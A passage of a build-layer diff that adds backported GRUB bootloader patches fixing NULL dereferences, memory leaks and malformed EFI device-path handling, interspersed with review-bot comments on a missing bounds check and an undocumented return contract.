21index 7ebf32e..8bf235f 100644
22--- a/grub-core/mmap/mmap.c
23+++ b/grub-core/mmap/mmap.c
24@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
25 hook_data))
26 {
27 grub_free (ctx.scanline_events);
28+ grub_free (present);
29 return GRUB_ERR_NONE;
30 }
31
32@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
33 }
34
35 grub_free (ctx.scanline_events);
36+ grub_free (present);
37 return GRUB_ERR_NONE;
38 }
39
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
1From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 27 Nov 2020 15:10:26 +0000
4Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
5
6It is always possible that grub_zalloc() could fail, so we should check for
7a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
8
9Fixes: CID 296221
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/net/net.c | 9 +++++++--
18 1 file changed, 7 insertions(+), 2 deletions(-)
19
20diff --git a/grub-core/net/net.c b/grub-core/net/net.c
21index 38f19df..7c2cdf2 100644
22--- a/grub-core/net/net.c
23+++ b/grub-core/net/net.c
24@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
25
26 /* Add sender to cache table. */
27 if (card->link_layer_table == NULL)
28- card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
29- * sizeof (card->link_layer_table[0]));
30+ {
31+ card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
32+ * sizeof (card->link_layer_table[0]));
33+ if (card->link_layer_table == NULL)
34+ return;
35+ }
36+
37 entry = &(card->link_layer_table[card->new_ll_entry]);
38 entry->avail = 1;
39 grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
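diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
+From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 19 Feb 2021 17:12:23 +0000
+Subject: [PATCH] net/tftp: Fix dangling memory pointer
+
+The static code analysis tool, Parfait, reported that the valid of
+file->data was left referencing memory that was freed by the call to
+grub_free(data) where data was initialized from file->data.
+
+To ensure that there is no unintentional access to this memory
+referenced by file->data we should set the pointer to NULL.
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/tftp.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
+index 7d90bf6..f76b19f 100644
+--- a/grub-core/net/tftp.c
++++ b/grub-core/net/tftp.c
+@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
+ }
+ destroy_pq (data);
+ grub_free (data);
++ file->data = NULL;
+ return GRUB_ERR_NONE;
+ }
+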
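diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
+From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 22 Jan 2021 12:32:41 +0000
+Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
+
+After processing the command-line yet arriving at the point where we are
+setting argv, we are allocating memory, even if argc == 0, which makes
+no sense since we never put anything into the allocated argv.
+
+The solution is to simply return that we've successfully processed the
+arguments but that argc == 0, and also ensure that argv is NULL when
+we're not allocating anything in it.
+
+There are only 2 callers of this function, and both are handling a zero
+value in argc assuming nothing is allocated in argv.
+
+Fixes: CID 96680
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/parser.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index 619db31..d1cf061 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
+ int i;
+
+ *argc = 0;
++ *argv = NULL;
+ do
+ {
+ if (!rd || !*rd)
+@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
+ (*argc)++;
+ }
+
++ /* If there are no args, then we're done. */
++ if (!*argc)
++ return 0;
++
+ /* Reserve memory for the return values. */
+ args = grub_malloc (bp - buffer);
+ if (!args)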
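Review bot: The new early `return 0` in grub_parser_split_cmdline() changes the function's output contract, but nothing in the hunk documents it for callers: after this patch a successful call can leave `*argv` as NULL with `*argc == 0`. The commit message says the two existing callers already cope, yet a future caller that indexes or frees `(*argv)[0]` on success would dereference NULL. I would extend the comment on the early return to say so, for example `/* If there are no args, then we're done: *argc is 0, *argv stays NULL and nothing was allocated. */`. The function's header comment lies outside the hunk and may deserve the same sentence.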
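diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
+From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
+From: Peter Jones <pjones@redhat.com>
+Date: Sun, 19 Jul 2020 16:53:27 -0400
+Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
+
+Several places we take the length of a device path and subtract 4 from
+it, without ever checking that it's >= 4. There are also cases where
+this kind of malformation will result in unpredictable iteration,
+including treating the length from one dp node as the type in the next
+node. These are all errors, no matter where the data comes from.
+
+This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
+can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
+return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
+the length is too small. Additionally, it makes several places in the
+code check for and return errors in these cases.
+
+Signed-off-by: Peter Jones <pjones@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 64 +++++++++++++++++++++++++-----
+ grub-core/loader/efi/chainloader.c | 13 +++++-
+ grub-core/loader/i386/xnu.c | 9 +++--
+ include/grub/efi/api.h | 14 ++++---
+ 4 files changed, 79 insertions(+), 21 deletions(-)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index ad170c7..6a38080 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ dp = dp0;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
+ && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
+ {
+- grub_efi_uint16_t len;
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
+ }
+
+@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (!name)
+ return NULL;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ *p++ = '/';
+
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ fp = (grub_efi_file_path_device_path_t *) dp;
+ /* According to EFI spec Path Name is NULL terminated */
+ while (len > 0 && fp->path_name[len - 1] == 0)
+@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
+ ;
+ p = GRUB_EFI_NEXT_DEVICE_PATH (p))
+ {
+- total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
++
++ /*
++ * In the event that we find a node that's completely garbage, for
++ * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
++ * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
++ * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
++ * and neither should our consumers, but there won't be any error raised
++ * even though the device path is junk.
++ *
++ * This keeps us from passing junk down back to our caller.
++ */
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ total_size += len;
+ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
+ break;
+ }
+@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
+ void
+ grub_efi_print_device_path (grub_efi_device_path_t *dp)
+ {
+- while (1)
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp))
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ /* Return non-zero. */
+ return 1;
+
+- while (1)
++ if (dp1 == dp2)
++ return 0;
++
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
+ {
+ grub_efi_uint8_t type1, type2;
+ grub_efi_uint8_t subtype1, subtype2;
+@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
+ }
+
++ /*
++ * There's no "right" answer here, but we probably don't want to call a valid
++ * dp and an invalid dp equal, so pick one way or the other.
++ */
++ if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return 1;
++ else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return -1;
++
+ return 0;
+ }
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index daf8c6b..a8d7b91 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+
+ size = 0;
+ d = dp;
+- while (1)
++ while (d)
+ {
+- size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ size += len;
+ if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
+ break;
+ d = GRUB_EFI_NEXT_DEVICE_PATH (d);
+diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
+index b7d176b..c50cb54 100644
+--- a/grub-core/loader/i386/xnu.c
++++ b/grub-core/loader/i386/xnu.c
+@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
+
+ devhead = buf;
+ buf = devhead + 1;
+- dpstart = buf;
++ dp = dpstart = buf;
+
+- do
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
+ {
+- dp = buf;
+ buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
++ break;
++ dp = buf;
+ }
+- while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
+
+ dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
+ - (char *) dpstart);
+diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
+index addcbfa..cf1355a 100644
+--- a/include/grub/efi/api.h
++++ b/include/grub/efi/api.h
+@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_DEVICE_PATH_TYPE(dp) ((dp)->type & 0x7f)
+ #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp) ((dp)->subtype)
+ #define GRUB_EFI_DEVICE_PATH_LENGTH(dp) ((dp)->length)
++#define GRUB_EFI_DEVICE_PATH_VALID(dp) ((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
+
+ /* The End of Device Path nodes. */
+ #define GRUB_EFI_END_DEVICE_PATH_TYPE (0xff & 0x7f)
+@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE 0x01
+
+ #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp) \
+- (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
+- && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
+- == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
++ (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
++ (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
++ && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
++ == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
+
+ #define GRUB_EFI_NEXT_DEVICE_PATH(dp) \
+- ((grub_efi_device_path_t *) ((char *) (dp) \
+- + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
++ (GRUB_EFI_DEVICE_PATH_VALID (dp) \
++ ? ((grub_efi_device_path_t *) \
++ ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
++ : NULL)
+
+ /* Hardware Device Path. */
+ #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE 1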
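Review bot: In the grub-core/loader/i386/xnu.c hunk, the rewritten loop condition `while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)` reads `dp->length` before it checks that `buf` is still inside the buffer, so a truncated or malformed devprop blob can still cause a read at or past `bufend`. Testing the bound first, `while (buf < bufend && GRUB_EFI_DEVICE_PATH_VALID (dp))`, and ideally requiring a full 4-byte node header before `bufend`, would close that. The advance `buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);` is also not checked against `bufend`, so the size passed to `grub_xnu_devprop_add_device()` can extend beyond the data that was read; comparing the node length with the remaining bytes before advancing would catch that. How `bufend` is derived lies outside the hunk, so this should be confirmed against the full function.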
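diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
+From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:15:25 +0000
+Subject: [PATCH] kern/efi: Fix memory leak on failure
+
+Free the memory allocated to name before returning on failure.
+
+Fixes: CID 296222
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6a38080..baeeef0 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ {
+ grub_error (GRUB_ERR_OUT_OF_RANGE,
+ "malformed EFI Device Path node has length=%d", len);
++ grub_free (name);
+ return NULL;
+ }
+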
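diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
+From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 11 Dec 2020 15:03:13 +0000
+Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
+
+The model of grub_efi_get_memory_map() is that if memory_map is NULL,
+then the purpose is to discover how much memory should be allocated to
+it for the subsequent call.
+
+The problem here is that with grub_efi_is_finished set to 1, there is no
+check at all that the function is being called with a non-NULL memory_map.
+
+While this MAY be true, we shouldn't assume it.
+
+The solution to this is to behave as expected, and if memory_map is NULL,
+then don't try to use it and allow memory_map_size to be filled in, and
+return 0 as is done later in the code if the buffer is too small (or NULL).
+
+Additionally, drop unneeded ret = 1.
+
+Fixes: CID 96632
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
+index b02fab1..5afcef7 100644
+--- a/grub-core/kern/efi/mm.c
++++ b/grub-core/kern/efi/mm.c
+@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
+ if (grub_efi_is_finished)
+ {
+ int ret = 1;
+- if (*memory_map_size < finish_mmap_size)
++
++ if (memory_map != NULL)
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
+- ret = 0;
++ if (*memory_map_size < finish_mmap_size)
++ {
++ grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
++ ret = 0;
++ }
++ else
++ grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+ }
+ else
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+- ret = 1;
++ /*
++ * Incomplete, no buffer to copy into, same as
++ * GRUB_EFI_BUFFER_TOO_SMALL below.
++ */
++ ret = 0;
+ }
+ *memory_map_size = finish_mmap_size;
+ if (map_key)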
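diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
+From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:41:27 +0000
+Subject: [PATCH] gnulib/regexec: Resolve unused variable
+
+This is a really minor issue where a variable is being assigned to but
+not checked before it is overwritten again.
+
+The reason for this issue is that we are not building with DEBUG set and
+this in turn means that the assert() that reads the value of the
+variable match_last is being processed out.
+
+The solution, move the assignment to match_last in to an ifdef DEBUG too.
+
+Fixes: CID 292459
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-unused-value.patch | 14 ++++++++++++++
+ 2 files changed, 15 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 46c4e95..9b01152 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+
+diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+new file mode 100644
+index 0000000..ba51f1b
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+@@ -0,0 +1,14 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-10-21 14:32:07.961765604 +0000
++@@ -828,7 +828,11 @@
++ break;
++ if (__glibc_unlikely (err != REG_NOMATCH))
++ goto free_return;
+++#ifdef DEBUG
+++ /* Only used for assertion below when DEBUG is set, otherwise
+++ it will be over-written when we loop around. */
++ match_last = -1;
+++#endif
++ }
++ else
++ break; /* We found a match. */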
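diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
+From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 22 Oct 2020 13:54:06 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
+
+The code is assuming that the value of br_token.constraint was
+initialized to zero when it wasn't.
+
+While some compilers will ensure that, not all do, so it is better to
+fix this explicitly than leave it to chance.
+
+Fixes: CID 73749
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-uninit-structure.patch | 11 +++++++++++
+ 2 files changed, 12 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9b01152..9e55458 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+new file mode 100644
+index 0000000..7b4d9f6
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+@@ -0,0 +1,11 @@
++--- a/lib/regcomp.c 2020-10-22 13:49:06.770168928 +0000
+++++ b/lib/regcomp.c 2020-10-22 13:50:37.026528298 +0000
++@@ -3662,7 +3662,7 @@
++ Idx alloc = 0;
++ #endif /* not RE_ENABLE_I18N */
++ reg_errcode_t ret;
++- re_token_t br_token;
+++ re_token_t br_token = {0};
++ bin_tree_t *tree;
++
++ sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);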
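diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
+From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 28 Oct 2020 14:43:01 +0000
+Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
+
+All other instances of call to __argp_failure() where there is
+a dgettext() call is first checking whether state is NULL before
+attempting to dereference it to get the root_argp->argp_domain.
+
+Fixes: CID 292436
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-null-state-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9e55458..96d7e69 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
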